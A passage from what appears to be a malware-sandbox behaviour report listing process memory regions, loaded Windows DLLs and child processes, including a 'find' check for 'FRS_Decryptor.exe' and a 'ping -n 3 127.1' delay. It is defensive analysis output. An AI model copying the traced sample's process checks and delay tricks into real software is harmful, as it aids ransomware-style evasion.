"pagefile_0x0000000000a30000" filename = "" Region: id = 3792 start_va = 0xa40000 end_va = 0xa7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a40000" filename = "" Region: id = 3793 start_va = 0xa80000 end_va = 0xabffff entry_point = 0x0 region_type = private name = "private_0x0000000000a80000" filename = "" Region: id = 3794 start_va = 0xac0000 end_va = 0xac3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ac0000" filename = "" Region: id = 3795 start_va = 0xad0000 end_va = 0xad0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ad0000" filename = "" Region: id = 3796 start_va = 0xae0000 end_va = 0xae1fff entry_point = 0x0 region_type = private name = "private_0x0000000000ae0000" filename = "" Region: id = 3797 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3798 start_va = 0x7f0e0000 end_va = 0x7f102fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f0e0000" filename = "" Region: id = 3799 start_va = 0x7f106000 end_va = 0x7f106fff entry_point = 0x0 region_type = private name = "private_0x000000007f106000" filename = "" Region: id = 3800 start_va = 0x7f109000 end_va = 0x7f109fff entry_point = 0x0 region_type = private name = "private_0x000000007f109000" filename = "" Region: id = 3801 start_va = 0x7f10d000 end_va = 0x7f10ffff entry_point = 0x0 region_type = private name = "private_0x000000007f10d000" filename = "" Region: id = 3802 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3803 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3804 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3805 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 3825 start_va = 0xbd0000 end_va = 0xbdffff entry_point = 0x0 region_type = private name = "private_0x0000000000bd0000" filename = "" Region: id = 3826 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3827 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3828 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3845 start_va = 0xa00000 end_va = 0xa0ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a00000" filename = "" Region: id = 3846 start_va = 0xa10000 end_va = 0xa13fff entry_point = 0x0 region_type = private name = "private_0x0000000000a10000" filename = "" Region: id = 3847 start_va = 0xa20000 end_va = 0xa22fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a20000" filename = "" Region: id = 3848 start_va = 0xaf0000 end_va = 0xb6dfff entry_point = 0xaf0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3849 start_va = 0xb70000 end_va = 0xb70fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b70000" filename = "" Region: id = 3850 start_va = 0xb80000 end_va = 0xb80fff entry_point = 0x0 region_type = private name = "private_0x0000000000b80000" filename = "" Region: id = 3851 start_va = 0xb90000 end_va = 0xb90fff entry_point = 0x0 region_type = private name = "private_0x0000000000b90000" filename = "" Region: id = 3852 start_va = 0xba0000 end_va = 0xba3fff entry_point = 0x0 region_type = private name = "private_0x0000000000ba0000" filename = "" Region: id = 3853 start_va = 0xbb0000 end_va = 0xbb0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000bb0000" filename = "" Region: id = 3854 start_va = 0xbc0000 end_va = 0xbc0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000bc0000" filename = "" Region: id = 3855 start_va = 0xbe0000 end_va = 0xcdffff entry_point = 0x0 region_type = private name = "private_0x0000000000be0000" filename = "" Region: id = 3856 start_va = 0xce0000 end_va = 0xe21fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ce0000" filename = "" Region: id = 3857 start_va = 0xe50000 end_va = 0xe5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000e50000" filename = "" Region: id = 3858 start_va = 0xe60000 end_va = 0xfe7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e60000" filename = "" Region: id = 3859 start_va = 0xff0000 end_va = 0x1170fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ff0000" filename = "" Region: id = 3860 start_va = 0x1180000 end_va = 0x257ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001180000" filename = "" Region: id = 3861 start_va = 0x2580000 end_va = 0x2854fff entry_point = 0x2580000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 3862 start_va = 0x2860000 end_va = 0x2c5bfff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002860000" filename = "" Region: id = 3863 start_va = 0x73470000 end_va = 0x734d0fff entry_point = 0x73470000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 3864 start_va = 0x734e0000 end_va = 0x734ebfff entry_point = 0x734e0000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 3865 start_va = 0x73530000 end_va = 0x7353ffff entry_point = 0x73530000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 3866 start_va = 0x73540000 end_va = 0x7355afff entry_point = 0x73540000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 3867 start_va = 0x73560000 end_va = 0x73569fff entry_point = 0x73560000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 3868 start_va = 0x73570000 end_va = 0x736b7fff entry_point = 0x73570000 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\SysWOW64\\dbghelp.dll" (normalized: "c:\\windows\\syswow64\\dbghelp.dll") Region: id = 3869 start_va = 0x736c0000 end_va = 0x736d1fff entry_point = 0x736c0000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\SysWOW64\\netapi32.dll" (normalized: "c:\\windows\\syswow64\\netapi32.dll") Region: id = 3870 start_va = 0x73da0000 end_va = 0x73ddcfff entry_point = 0x73da0000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 3871 start_va = 0x73de0000 end_va = 0x73df3fff entry_point = 0x73de0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 3872 start_va = 0x73e10000 end_va = 0x73e18fff entry_point = 0x73e10000 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\SysWOW64\\secur32.dll" (normalized: "c:\\windows\\syswow64\\secur32.dll") Region: id = 3873 start_va = 0x74310000 end_va = 0x74317fff entry_point = 0x74310000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 3874 start_va = 0x745f0000 end_va = 0x745f8fff entry_point = 0x745f0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 3875 start_va = 0x74a60000 end_va = 0x74ab2fff entry_point = 0x74a60000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 3876 start_va = 0x74ac0000 end_va = 0x74ac8fff entry_point = 0x74ac0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3877 start_va = 0x74ad0000 end_va = 0x74aecfff entry_point = 0x74ad0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3878 start_va = 0x74bc0000 end_va = 0x74d0dfff entry_point = 0x74bc0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 3879 start_va = 0x74d10000 end_va = 0x74d87fff entry_point = 0x74d10000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 3880 start_va = 0x74d90000 end_va = 0x74e16fff entry_point = 0x74d90000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 3881 start_va = 0x74e20000 end_va = 0x74ed0fff entry_point = 0x74e20000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3882 start_va = 0x74ee0000 end_va = 0x74f2cfff entry_point = 0x74ee0000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 3883 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3884 start_va = 0x75360000 end_va = 0x75456fff entry_point = 0x75360000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 3885 start_va = 0x75460000 end_va = 0x755aefff entry_point = 0x75460000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 3886 start_va = 0x75700000 end_va = 0x7577cfff entry_point = 0x75700000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 3887 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3888 start_va = 0x75a10000 end_va = 0x75a4dfff entry_point = 0x75a10000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3889 start_va = 0x76c50000 end_va = 0x76d5bfff entry_point = 0x76c50000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 3890 start_va = 0x76d60000 end_va = 0x76d66fff entry_point = 0x76d60000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 3891 start_va = 0x76d70000 end_va = 0x76db0fff entry_point = 0x76d70000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 3892 start_va = 0x76dc0000 end_va = 0x76de4fff entry_point = 0x76dc0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 3893 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3894 start_va = 0x76ec0000 end_va = 0x76fc7fff entry_point = 0x76ec0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 3895 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 3896 start_va = 0x73420000 end_va = 0x73461fff entry_point = 0x73420000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 3897 start_va = 0x2c60000 end_va = 0x2c9ffff entry_point = 0x0 region_type = private name = "private_0x0000000002c60000" filename = "" Region: id = 3898 start_va = 0x2ca0000 end_va = 0x2cdffff entry_point = 0x0 region_type = private name = "private_0x0000000002ca0000" filename = "" Region: id = 3899 start_va = 0x2ce0000 end_va = 0x2d1ffff entry_point = 0x0 region_type = private name = "private_0x0000000002ce0000" filename = "" Region: id = 3900 start_va = 0x2d20000 end_va = 0x2d5ffff entry_point = 0x0 region_type = private name = "private_0x0000000002d20000" filename = "" Region: id = 3901 start_va = 0x2d60000 end_va = 0x2d9ffff entry_point = 0x0 region_type = private name = "private_0x0000000002d60000" filename = "" Region: id = 3902 start_va = 0x2da0000 end_va = 0x2ddffff entry_point = 0x0 region_type = private name = "private_0x0000000002da0000" filename = "" Region: id = 3903 start_va = 0x73410000 end_va = 0x7341ffff entry_point = 0x73410000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 3904 start_va = 0x73f20000 end_va = 0x73f3cfff entry_point = 0x73f20000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 3905 start_va = 0x73f40000 end_va = 0x73f6efff entry_point = 0x73f40000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 3906 start_va = 0x73f70000 end_va = 0x73f87fff entry_point = 0x73f70000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 3907 start_va = 0x7efdd000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdd000" filename = "" Region: id = 3908 start_va = 0x7f103000 end_va = 0x7f105fff entry_point = 0x0 region_type = private name = "private_0x000000007f103000" filename = "" Region: id = 3909 start_va = 0x7f10a000 end_va = 0x7f10cfff entry_point = 0x0 region_type = private name = "private_0x000000007f10a000" filename = "" Region: id = 3910 start_va = 0x73360000 end_va = 0x7340afff entry_point = 0x73360000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Thread: id = 218 os_tid = 0x72c Thread: id = 220 os_tid = 0x810 Thread: id = 221 os_tid = 0xbf4 Thread: id = 222 os_tid = 0x728 Process: id = "72" image_name = "find.exe" filename = "c:\\windows\\syswow64\\find.exe" page_root = "0x3a8e000" os_pid = "0x6b0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "70" os_parent_pid = "0x770" cmd_line = "find /i \"FRS_Decryptor.exe\"" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3807 start_va = 0xaa0000 end_va = 0xabffff entry_point = 0x0 region_type = private name = "private_0x0000000000aa0000" filename = "" Region: id = 3808 start_va = 0xac0000 end_va = 0xac1fff entry_point = 0x0 region_type = private name = "private_0x0000000000ac0000" filename = "" Region: id = 3809 start_va = 0xad0000 end_va = 0xadefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ad0000" filename = "" Region: id = 3810 start_va = 0xae0000 end_va = 0xb1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000ae0000" filename = "" Region: id = 3811 start_va = 0xb20000 end_va = 0xb5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b20000" filename = "" Region: id = 3812 start_va = 0xb60000 end_va = 0xb63fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b60000" filename = "" Region: id = 3813 start_va = 0xb70000 end_va = 0xb70fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b70000" filename = "" Region: id = 3814 start_va = 0xb80000 end_va = 0xb81fff entry_point = 0x0 region_type = private name = "private_0x0000000000b80000" filename = "" Region: id = 3815 start_va = 0x11c0000 end_va = 0x11c6fff entry_point = 0x11c0000 region_type = mapped_file name = "find.exe" filename = "\\Windows\\SysWOW64\\find.exe" (normalized: "c:\\windows\\syswow64\\find.exe") Region: id = 3816 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3817 start_va = 0x7f400000 end_va = 0x7f422fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f400000" filename = "" Region: id = 3818 start_va = 0x7f42a000 end_va = 0x7f42cfff entry_point = 0x0 region_type = private name = "private_0x000000007f42a000" filename = "" Region: id = 3819 start_va = 0x7f42d000 end_va = 0x7f42dfff entry_point = 0x0 region_type = private name = "private_0x000000007f42d000" filename = "" Region: id = 3820 start_va = 0x7f42f000 end_va = 0x7f42ffff entry_point = 0x0 region_type = private name = "private_0x000000007f42f000" filename = "" Region: id = 3821 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3822 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3823 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3824 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 3829 start_va = 0xbe0000 end_va = 0xbeffff entry_point = 0x0 region_type = private name = "private_0x0000000000be0000" filename = "" Region: id = 3830 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3831 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3832 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3833 start_va = 0xaa0000 end_va = 0xaaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000aa0000" filename = "" Region: id = 3834 start_va = 0xab0000 end_va = 0xab3fff entry_point = 0x0 region_type = private name = "private_0x0000000000ab0000" filename = "" Region: id = 3835 start_va = 0xac0000 end_va = 0xac3fff entry_point = 0x0 region_type = private name = "private_0x0000000000ac0000" filename = "" Region: id = 3836 start_va = 0xbf0000 end_va = 0xc6dfff entry_point = 0xbf0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3837 start_va = 0xcc0000 end_va = 0xccffff entry_point = 0x0 region_type = private name = "private_0x0000000000cc0000" filename = "" Region: id = 3838 start_va = 0xd30000 end_va = 0xe2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d30000" filename = "" Region: id = 3839 start_va = 0x734f0000 end_va = 0x734fefff entry_point = 0x734f0000 region_type = mapped_file name = "fsutilext.dll" filename = "\\Windows\\SysWOW64\\fsutilext.dll" (normalized: "c:\\windows\\syswow64\\fsutilext.dll") Region: id = 3840 start_va = 0x73500000 end_va = 0x73520fff entry_point = 0x73500000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\SysWOW64\\ulib.dll" (normalized: "c:\\windows\\syswow64\\ulib.dll") Region: id = 3841 start_va = 0x74f70000 end_va = 0x750affff entry_point = 0x74f70000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3842 start_va = 0x75940000 end_va = 0x75a0efff entry_point = 0x75940000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3843 start_va = 0x76df0000 end_va = 0x76eadfff entry_point = 0x76df0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3844 start_va = 0x7f300000 end_va = 0x7f3fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f300000" filename = "" Thread: id = 219 os_tid = 0x5f8 Process: id = "73" image_name = "ping.exe" filename = "c:\\windows\\syswow64\\ping.exe" page_root = "0x1273d000" os_pid = "0x9c0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa5c" cmd_line = "ping -n 3 127.1" cur_dir = "C:\\Users\\5JgHKoaOfdp\\Desktop\\" os_username = "FIVAUF\\5JgHKoaOfdp" os_groups = "FIVAUF\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000bed0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3911 start_va = 0x120000 end_va = 0x13ffff entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 3912 start_va = 0x140000 end_va = 0x141fff entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 3913 start_va = 0x150000 end_va = 0x15efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 3914 start_va = 0x160000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 3915 start_va = 0x1a0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 3916 start_va = 0x1e0000 end_va = 0x1e3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 3917 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 3918 start_va = 0x200000 end_va = 0x201fff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 3919 start_va = 0x940000 end_va = 0x948fff entry_point = 0x940000 region_type = mapped_file name = "ping.exe" filename = "\\Windows\\SysWOW64\\PING.EXE" (normalized: "c:\\windows\\syswow64\\ping.exe") Region: id = 3920 start_va = 0x770a0000 end_va = 0x77207fff entry_point = 0x770a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3921 start_va = 0x7f5f0000 end_va = 0x7f612fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f5f0000" filename = "" Region: id = 3922 start_va = 0x7f615000 end_va = 0x7f615fff entry_point = 0x0 region_type = private name = "private_0x000000007f615000" filename = "" Region: id = 3923 start_va = 0x7f618000 end_va = 0x7f618fff entry_point = 0x0 region_type = private name = "private_0x000000007f618000" filename = "" Region: id = 3924 start_va = 0x7f61d000 end_va = 0x7f61ffff entry_point = 0x0 region_type = private name = "private_0x000000007f61d000" filename = "" Region: id = 3925 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3926 start_va = 0x7fff0000 end_va = 0x7ffb1d6dffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3927 start_va = 0x7ffb1d6e0000 end_va = 0x7ffb1d889fff entry_point = 0x7ffb1d6e0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3928 start_va = 0x7ffb1d88a000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffb1d88a000" filename = "" Region: id = 3929 start_va = 0x3b0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 3930 start_va = 0x76fd0000 end_va = 0x76fd8fff entry_point = 0x76fd0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3931 start_va = 0x76fe0000 end_va = 0x77047fff entry_point = 0x76fe0000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3932 start_va = 0x77050000 end_va = 0x77098fff entry_point = 0x77050000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3933 start_va = 0x120000 end_va = 0x12ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 3934 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 3935 start_va = 0x230000 end_va = 0x32ffff entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 3936 start_va = 0x330000 end_va = 0x3adfff entry_point = 0x330000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3937 start_va = 0x5a0000 end_va = 0x5affff entry_point = 0x0 region_type = private name = "private_0x00000000005a0000" filename = "" Region: id = 3938 start_va = 0x73db0000 end_va = 0x73db7fff entry_point = 0x73db0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") Region: id = 3939 start_va = 0x73dc0000 end_va = 0x73dddfff entry_point = 0x73dc0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 3940 start_va = 0x74a60000 end_va = 0x74ab2fff entry_point = 0x74a60000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 3941 start_va = 0x74ac0000 end_va = 0x74ac8fff entry_point = 